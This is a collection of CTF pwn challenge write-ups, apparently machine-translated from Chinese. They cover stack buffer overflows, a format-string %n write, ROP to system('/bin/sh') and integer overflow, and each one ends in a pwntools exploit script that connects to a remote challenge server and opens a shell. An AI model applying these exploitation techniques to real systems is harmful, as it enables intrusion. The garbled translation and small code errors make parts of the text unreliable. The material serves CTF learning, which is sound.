get_shell

Title Description ： You can get it by running shell, Really?
First checksec once

64 position
Only stack executable protection is enabled
ida open
Look at the main function , What a big one system(/bin/sh)
then puts and binsh The address difference is the offset
exp

rom pwn import *
m=remote('220.249.52.133',xxxxx)
binsh = 0x400574
payload='a'*(0x3a-0x18) +p64(binsh)
m.sendline(payload)
m.interactive()

CGfsb

source ：CGCTF
Title Description ： Vegetable chicken face to face pringf To be worried , He didn't know prinf In addition to the output, what role does it play

checksec
32 position , Only PIE Did not open ( Applied PIE The program will change the loading base address every time it is loaded , So that the gadget Also invalid )
Analyze the main function ：
Obviously make pwnme be equal to 8 that will do
Format string vulnerability

Introduction to common basic formatting string parameters ：
%c： The output characters , Deserve to go up %n Can be used to write data to a specified address
%d： Output decimal integer , Deserve to go up %n Can be used to write data to a specified address .
%x： Output 16 Hexadecimal data , Such as %i$x Indicates the offset to be leaked i It's about 4 Byte long 16 Hexadecimal data ,%i$lx Indicates the offset to be leaked i It's about 8 Byte long 16 Hexadecimal data ,32bit and 64bit In the same environment .
%p： Output 16 Hexadecimal data , And %x Is essentially the same , Just prefixed 0x, stay 32bit Lower output 4 byte , stay 64bit Lower output 8 byte , The target environment can be judged by the length of the output bytes 32bit still 64bit.
%s： The output is a string , Output the string pointed to by the pointer at the offset , Such as %i$s Indicates the output offset i The string pointed to by the address at , stay 32bit and 64bit In the same environment , Available for reading GOT Table and other information .

%n： take %n Before printf The number of characters that have been printed is assigned to the address position pointed to by the pointer at the offset , Such as %100×10$n It means that you will 0x64 Write offset 10 The address pointed to by the pointer saved at （4 byte ）, and %$hn Indicates that the address space written is 2 byte ,%$hhn Indicates that the address space written is 1 byte ,%$lln Indicates that the address space written is 8 byte , stay 32bit and 64bit In the same environment .
Sometimes , direct writing 4 Bytes can cause the program to crash or wait too long , Can pass %$hn or %$hhn To adjust in time ;%n Is the key way to change the program flow through format string vulnerability , Other formatted string parameters can be used to read information or match %n Writing data .

Here use %n To write 8
So what we need to do is

 hold pwnme Enter your address into s That is to say message
 Get the offset 
 Put it properly %n

be in bss paragraph pwnme Global variables , The address remains the same

function ./ file message Internal input AAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p
To the entered AAA Prior to 10 position , So the offset is 10
exp

from pwn import *
m=remote('220.249.52.133',54971)

pwnme= 0x0804A068
payload= p32(pwnme)+'aaaa'+'%10$n'

m.recvuntil("please tell me your name:\n")
m.sendline('caiman')
m.recvuntil("leave your message please:\n")
m.sendline(payload)

m.interactive()

Running results

when_did_you_born

source ：CGCTF
Title Description ： As long as you know your age, you can get flag, But Caiji found that the input was incorrect anyway , What do I do

64 position , Open address randomly 、 Stack protection 、 Stack stack executable
Run it , You need to enter your birthday and name
ida Open analysis main function

Discover as long as v5=1926 that will do , But in the first if Cannot be equal to 1926,
gets(&v4)gets No restrictions on input ,
therefore 1926 Input to v4 And then overflow coverage v5, The input name Time input 1926+ Number of bytes to fill
exp

from pwn import*
m=remote(" ", )
payload='a'*(0x20-0x18)+p64(1926)
m.recvuntil("What's Your Birth?\n")
m.sendline("111")
m.recvuntil("What's Your Name?\n")
m.sendline(payload)
m.interactive()

level0

source ：XMAN
Title Description ： Vegetable chicken knows what overflow is , He believes he can get it shell

64 position , It's only on NX
Run it , It's nothing
ida Open the analysis main function
Noteworthy functions

calsystem() Sure get shell

read() Overflow in function , Overwrite the return address with callsystem Entrance
sys_addr=0x400596,

exp

from pwn import *

ma=remote('47.114.137.161',50944)

sys_addr=0x400596

payload='a'*0x80+'b'*8+p64(sys_addr)

ma.sendline(payload)

ma.interactive()

level2

source ：XMAN
Title Description ： Vegetable chicken, please ask the great God how to get flag, The great God told him ‘ Use Return oriented programming (ROP) That's all right. ’
checksec
32 position , It's only on NX Protect
ida Look at the main function


shift F12 Find the string /bin/sh

exp

#ROP
from pwn import*
m.remote('',)
system_addr=0x08048320 
binsh=0x0804A024
payload='a'*0x88+'aaaa'+p32(system_addr)+'aaaa'+p32(binsh)
m.sendline(payload)
m.interactive()

cgpwn2

source ：CGCTF
Title Description ： Caiji thinks he needs a string

32 Bit order , Open the RELRO and NX
ida open

Don't let go of fgets() and gets()

Global variables name stay bss On segment , unchanged , write in /bin/sh

The offset (0xD9-0XF7)

exp

from pwn import *

m=remote('220.249.52.133',55046)

system_addr=0x08048420

name_addr=0x804a080

m.sendline("/bin/sh")

payload= 'a'*42+p32(system_addr)+'aaaa'+p32(name_addr)

m.sendline(payload)

m.interactive()

Positioning angle

Inexplicably inserted a QR code positioning angle ？！

int_overflow

Title Description ： Caiji feels that there seems to be no way to overflow this problem , Really? ?

• First check the protection mechanism checksec 1

no canary found

When entering the password , Get the length of the string and store it in the variable _int8 in ,_int8 The length is 256.
The password length is limited to 3-8 Between bytes , Using integer overflow , that 259-264 byte （ The overflow part will be ignored and only the last one will be taken 3-8 byte ） Yes. .
what is this See that you can return cat flag
The whole idea ： Through integer overflow check_passwd The return address of is written as what_is_this, perform cat flag
exp

from pwn import*
io=remote('111.200.241.244',58194)
sys_addr=0x08048694
payload='a'*0x14+'bbbb'+p32(sys_addr)+'a'*(256-14-4-4)
io.sendlineafter("Your choice:","1")
io.sendlineafter("Please input your username:","caiman")
io.recvuntil("Please input your passwd:",)
io.sendline(payload)
io.interactive()